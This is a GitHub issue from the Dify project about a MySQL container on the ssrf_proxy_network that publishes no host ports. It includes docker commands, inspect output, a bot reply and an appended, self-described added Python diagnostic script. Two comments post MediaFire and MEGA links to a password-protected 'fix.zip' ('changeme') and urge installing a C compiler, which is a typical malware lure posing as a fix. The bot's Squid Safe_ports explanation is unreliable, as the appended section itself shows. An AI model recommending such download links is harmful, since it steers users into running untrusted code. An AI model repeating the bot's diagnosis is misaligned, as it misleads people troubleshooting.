langgenius / dify

Dify is an open-source LLM app development platform. Dify's intuitive interface combines AI workflow, RAG pipeline, agent capabilities, model management, observability features and more, letting you quickly go from prototype to production.
https://dify.ai

I started a mysql container. When the ssrf_proxy_network network is configured, the set port cannot be exposed #8876

Open dingidng opened 2 hours ago

dingidng commented 2 hours ago

Self Checks

Dify version

0.8.2

Cloud or Self Hosted

Self Hosted (Docker)

Steps to reproduce

1. Modified the container configuration

       docker_ssrf_proxy_network:
         external: true

2. docker run

       docker run --name mysql -d --net docker_ssrf_proxy_network -p 0.0.0.0:8502:3306 -v mysql-data:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=123456 -e MYSQL_DATABASE=test mysql:latest

   or

       services:
         mysql:
           command:
             - --mysql-native-password=on
           container_name: ${CONTAINER_NAME}
           environment:
             MYSQL_ROOT_PASSWORD: ${PANEL_DB_ROOT_PASSWORD}
           image: mysql:8.4.2
           labels:
             createdBy: Apps
           networks:
             - docker_ssrf_proxy_network
           ports:
             - "8502:3306"
           restart: always
           volumes:
             - ./data/:/var/lib/mysql
             - ./conf/my.cnf:/etc/my.cnf
             - ./log:/var/log/mysql
             - /etc/timezone:/etc/timezone:ro
             - /etc/localtime:/etc/localtime:ro
       networks:
         docker_ssrf_proxy_network:
           external: true

View containers in a network

docker network inspect docker_ssrf_proxy_network --format '{{json .Containers}}' | jq .
{
  "0dd1b01c374805496dcffb76f3edc91c87979b5ae37dcdcad4cb5b2e1f3a4532": {
    "Name": "docker-worker-1",
    "EndpointID": "188c1484ebf019fc0fe3772733fbe59d86bbc7757601498d900a7304d8333fc8",
    "MacAddress": "02:42:ac:12:00:06",
    "IPv4Address": "172.18.0.6/16",
    "IPv6Address": ""
  },
  "23823cda027664b6862928cbb7b8ac38f8efba47a4659d87013c0faccf0a0a9f": {
    "Name": "docker-api-1",
    "EndpointID": "b5fa9186b9b2911c135897ce7beb1217b3634c22d0cfd6c572ef9adbe634a160",
    "MacAddress": "02:42:ac:12:00:05",
    "IPv4Address": "172.18.0.5/16",
    "IPv6Address": ""
  },
  "2b7d9c9dadd8bb35e9be06517e1c202750f6c7c8ccbd10ed6ea75936f769af9a": {
    "Name": "docker-sandbox-1",
    "EndpointID": "d12d7d2ad4985676e7914f9c295ac5b47a20c408c35c8fc063e96db2780b5f56",
    "MacAddress": "02:42:ac:12:00:04",
    "IPv4Address": "172.18.0.4/16",
    "IPv6Address": ""
  },
  "8d179d4b7f1634e858c11a995108b268a31ad00a9a0f2b9b950939658ac50b92": {
    "Name": "1Panel-mysql-a4ee",
    "EndpointID": "3660f8df23f6ac1151982aaa44a81f007bc8eb0a138b6b376eeb3ed471b99917",
    "MacAddress": "02:42:ac:12:00:07",
    "IPv4Address": "172.18.0.7/16",
    "IPv6Address": ""
  },
  "bdc1e1c3b2c91d3cdf085038de262cdc0e27f8688d26886fcef0712c9dea06e3": {
    "Name": "docker-db-1",
    "EndpointID": "adb62da58faac37f6864e52dd3d08512c665a06bce0a5004b2f5221ec35ccd0d",
    "MacAddress": "02:42:ac:12:00:02",
    "IPv4Address": "172.18.0.2/16",
    "IPv6Address": ""
  },
  "deb1407805e066c6acdf910b25453820ebdfad026a6b2cb7d62bf69e33bbd672": {
    "Name": "docker-ssrf_proxy-1",
    "EndpointID": "8af082f294b24089fa1bf20f4217866e230354f8d1df6152cf6f9ab3cf308658",
    "MacAddress": "02:42:ac:12:00:03",
    "IPv4Address": "172.18.0.3/16",
    "IPv6Address": ""
  }
}

Confirmed it is on the network, but the set port cannot be exposed

8d179d4b7f16   mysql:8.4.2                            "docker-entrypoint.s…"   8 hours ago   Up 8 hours                                                                                        1Panel-mysql-a4ee
e5891542c6ec   nginx:latest                           "sh -c 'cp /docker-e…"   9 hours ago   Up 9 hours             0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp   docker-nginx-1
23823cda0276   langgenius/dify-api:0.8.2              "/bin/bash /entrypoi…"   9 hours ago   Up 9 hours             5001/tcp                                                                   docker-api-1
0dd1b01c3748   langgenius/dify-api:0.8.2              "/bin/bash /entrypoi…"   9 hours ago   Up 9 hours             5001/tcp                                                                   docker-worker-1
ebe68e2c7e28   langgenius/dify-web:0.8.2              "/bin/sh ./entrypoin…"   9 hours ago   Up 9 hours             3000/tcp                                                                   docker-web-1
2b7d9c9dadd8   langgenius/dify-sandbox:0.2.7          "/main"                  9 hours ago   Up 9 hours (healthy)                                                                              docker-sandbox-1
bdc1e1c3b2c9   postgres:15-alpine                     "docker-entrypoint.s…"   9 hours ago   Up 9 hours (healthy)   0.0.0.0:9380->5432/tcp, [::]:9380->5432/tcp                                docker-db-1
deb1407805e0   ubuntu/squid:latest                    "sh -c 'cp /docker-e…"   9 hours ago   Up 9 hours             3128/tcp                                                                   docker-ssrf_proxy-1

✔️ Expected Behavior

For detailed guidance, thank you

❌ Actual Behavior

For detailed guidance, thank you

SagarChandra07 commented 2 hours ago

I think this will help you. https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Archive password: changeme

you may need to install the c compiler

SagarChandra07 commented 2 hours ago

This might help: this file might fix it

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA Archive codepass: changeme. If you don't have the C compiler, install it (gcc or clang).

dosubot[bot] commented 2 hours ago

The set port cannot be exposed when the ssrf_proxy_network is configured for a MySQL container because the ssrf_proxy_network configuration in the squid.conf.template restricts access to specific safe ports. The MySQL default port (3306) is not included in the Safe_ports ACL, which only allows ports 80, 21, 443, 70, 210, 1025-65535, 280, 488, 591, and 777.

Here is the relevant part of the squid.conf.template:

acl Safe_ports port 80        # http
acl Safe_ports port 21        # ftp
acl Safe_ports port 443       # https
acl Safe_ports port 70        # gopher
acl Safe_ports port 210       # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280       # http-mgmt
acl Safe_ports port 488       # gss-http
acl Safe_ports port 591       # filemaker
acl Safe_ports port 777       # multiling http

Since port 3306 is not listed, the http_access deny !Safe_ports rule will block access to it:

http_access deny !Safe_ports

To resolve this issue, you need to modify the squid.conf.template to include port 3306 in the Safe_ports ACL. Add the following line to the squid.conf.template:

acl Safe_ports port 3306      # MySQL

This change will allow the MySQL port to be accessed through the ssrf_proxy_network [1][2].

To continue talking to Dosu, mention @dosu.

dingidng commented 2 hours ago

When ssrf_proxy_network is configured for the MySQL container, the set port cannot be exposed, because the squid.conf.template configuration in ssrf_proxy_network restricts access to specific safe ports. The MySQL default port (3306) is not included in the Safe_ports ACL, which only allows ports 80, 21, 443, 70, 210, 1025-65535, 280, 488, 591 and 777.

Here is the relevant part of squid.conf.template:

acl Safe_ports port 80        # http
acl Safe_ports port 21        # ftp
acl Safe_ports port 443       # https
acl Safe_ports port 70        # gopher
acl Safe_ports port 210       # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280       # http-mgmt
acl Safe_ports port 488       # gss-http
acl Safe_ports port 591       # filemaker
acl Safe_ports port 777       # multiling http

Since port 3306 is not listed, the http_access deny !Safe_ports rule will block access to it:

http_access deny !Safe_ports

To resolve this issue, you need to modify squid.conf.template to include port 3306 in the Safe_ports ACL. Add the following line to squid.conf.template:

acl Safe_ports port 3306      # MySQL

This change will allow the MySQL port to be accessed through the ssrf_proxy_network [1][2].

To continue talking to Dosu, mention @dosu.

After the above modification, the mysql container still cannot expose ports. @dosu

8d179d4b7f16   mysql:8.4.2                            "docker-entrypoint.s…"   8 hours ago   Up 8 hours                                                                                        1Panel-mysql-a4ee
e5891542c6ec   nginx:latest                           "sh -c 'cp /docker-e…"   9 hours ago   Up 9 hours             0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp   docker-nginx-1
23823cda0276   langgenius/dify-api:0.8.2              "/bin/bash /entrypoi…"   9 hours ago   Up 9 hours             5001/tcp                                                                   docker-api-1
0dd1b01c3748   langgenius/dify-api:0.8.2              "/bin/bash /entrypoi…"   9 hours ago   Up 9 hours             5001/tcp                                                                   docker-worker-1
ebe68e2c7e28   langgenius/dify-web:0.8.2              "/bin/sh ./entrypoin…"   9 hours ago   Up 9 hours             3000/tcp                                                                   docker-web-1
2b7d9c9dadd8   langgenius/dify-sandbox:0.2.7          "/main"                  9 hours ago   Up 9 hours (healthy)                                                                              docker-sandbox-1
bdc1e1c3b2c9   postgres:15-alpine                     "docker-entrypoint.s…"   9 hours ago   Up 9 hours (healthy)   0.0.0.0:9380->5432/tcp, [::]:9380->5432/tcp                                docker-db-1
deb1407805e0   ubuntu/squid:latest                    "sh -c 'cp /docker-e…"   9 hours ago   Up 9 hours             3128/tcp                                                                   docker-ssrf_proxy-1
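A check for the symptom in the docker ps output above (an empty PORTS column for 1Panel-mysql-a4ee), as an added example that is not part of the issue or of the Dify project. Dify's docker-compose.yaml declares ssrf_proxy_network with `internal: true` so that the sandbox and the SSRF proxy cannot reach the outside, and Docker publishes no host ports for a container whose only networks are internal. The Squid Safe_ports ACL quoted above governs what the proxy will forward (and 3306 already falls inside its 1025-65535 range); it has no effect on how Docker maps ports, so editing squid.conf.template cannot change the PORTS column. The script reads `docker container inspect` and `docker network inspect` when the docker CLI is present and otherwise falls back to constructed sample data modelled on the inspect output in the issue; the container name, the network names and the Internal flag values in the samples are assumptions.

```python
"""Diagnose why a container's published ports do not appear in `docker ps`.

Added example; not code from the Dify project or from the issue author.
Docker sets up no host port publishing for a container attached only to
`internal: true` networks, which is how Dify's docker-compose.yaml declares
ssrf_proxy_network. The sample data below is constructed to mirror the
inspect output quoted in the issue, reduced to the fields this check needs.
"""
import json
import shutil
import subprocess

# Constructed sample: shape of `docker network inspect` for the two networks
# involved. The Internal flags are assumptions, not values from the issue.
SAMPLE_NETWORKS = {
    "docker_ssrf_proxy_network": {"Name": "docker_ssrf_proxy_network", "Internal": True},
    "docker_default": {"Name": "docker_default", "Internal": False},
}

# Constructed sample: shape of `docker container inspect` for the MySQL
# container from the issue, attached only to the internal network.
SAMPLE_CONTAINER = {
    "Name": "/1Panel-mysql-a4ee",
    "HostConfig": {"PortBindings": {"3306/tcp": [{"HostIp": "0.0.0.0", "HostPort": "8502"}]}},
    "NetworkSettings": {"Networks": {"docker_ssrf_proxy_network": {}}},
}


def docker_inspect(kind, name):
    """Run `docker <kind> inspect <name>` and return the first object, or None
    when the docker CLI is unavailable or the object does not exist."""
    if shutil.which("docker") is None:
        return None
    out = subprocess.run(["docker", kind, "inspect", name], capture_output=True, text=True)
    if out.returncode != 0:
        return None
    return json.loads(out.stdout)[0]


def diagnose(container, networks):
    """Return a dict describing whether the container's port bindings can take
    effect. `networks` maps network name -> its inspect object."""
    bindings = container.get("HostConfig", {}).get("PortBindings") or {}
    attached = list(container.get("NetworkSettings", {}).get("Networks", {}))
    internal = [n for n in attached if networks.get(n, {}).get("Internal", False)]
    external = [n for n in attached if n not in internal]
    result = {
        "container": container.get("Name", "").lstrip("/"),
        "requested_bindings": sorted(bindings),
        "attached": attached,
        "internal_only": bool(attached) and not external,
    }
    if not bindings:
        result["status"] = "no_ports_requested"
    elif result["internal_only"]:
        result["status"] = "unpublishable"
        result["reason"] = (
            "every attached network is internal (%s); Docker publishes no host "
            "ports for such a container, so `docker ps` shows an empty PORTS column"
            % ", ".join(internal)
        )
        result["fix"] = (
            "also attach the container to a non-internal network, and bind the "
            "published port to 127.0.0.1 rather than 0.0.0.0 unless remote "
            "access is actually needed"
        )
    else:
        result["status"] = "publishable"
    # Wildcard bindings are flagged separately: 0.0.0.0 or :: exposes the
    # service on every host interface once publishing does work.
    result["wildcard_bindings"] = sorted(
        port for port, hosts in bindings.items()
        if any(h.get("HostIp") in ("", "0.0.0.0", "::") for h in hosts or [])
    )
    return result


def main(container_name="1Panel-mysql-a4ee"):
    """Inspect a live container if docker is available, else use the sample."""
    container = docker_inspect("container", container_name) or SAMPLE_CONTAINER
    names = container["NetworkSettings"]["Networks"]
    networks = {n: (docker_inspect("network", n) or SAMPLE_NETWORKS.get(n, {})) for n in names}
    print(json.dumps(diagnose(container, networks), indent=2))


if __name__ == "__main__":
    main()
```

Run against the constructed sample, the report is `unpublishable` with the internal-network reason, and 3306/tcp is listed under wildcard_bindings because the issue's command binds it to 0.0.0.0. The fix that keeps Dify's isolation intact is to give the MySQL container a second, non-internal network (the compose project's own default network, for instance) for the published port, and to bind that port to 127.0.0.1 where only local access is needed. Note that a database left on ssrf_proxy_network is reachable from docker-sandbox-1 and docker-ssrf_proxy-1, which the network inspect output above shows on the same network, so a dedicated network between the database and the services that need it is the tighter choice.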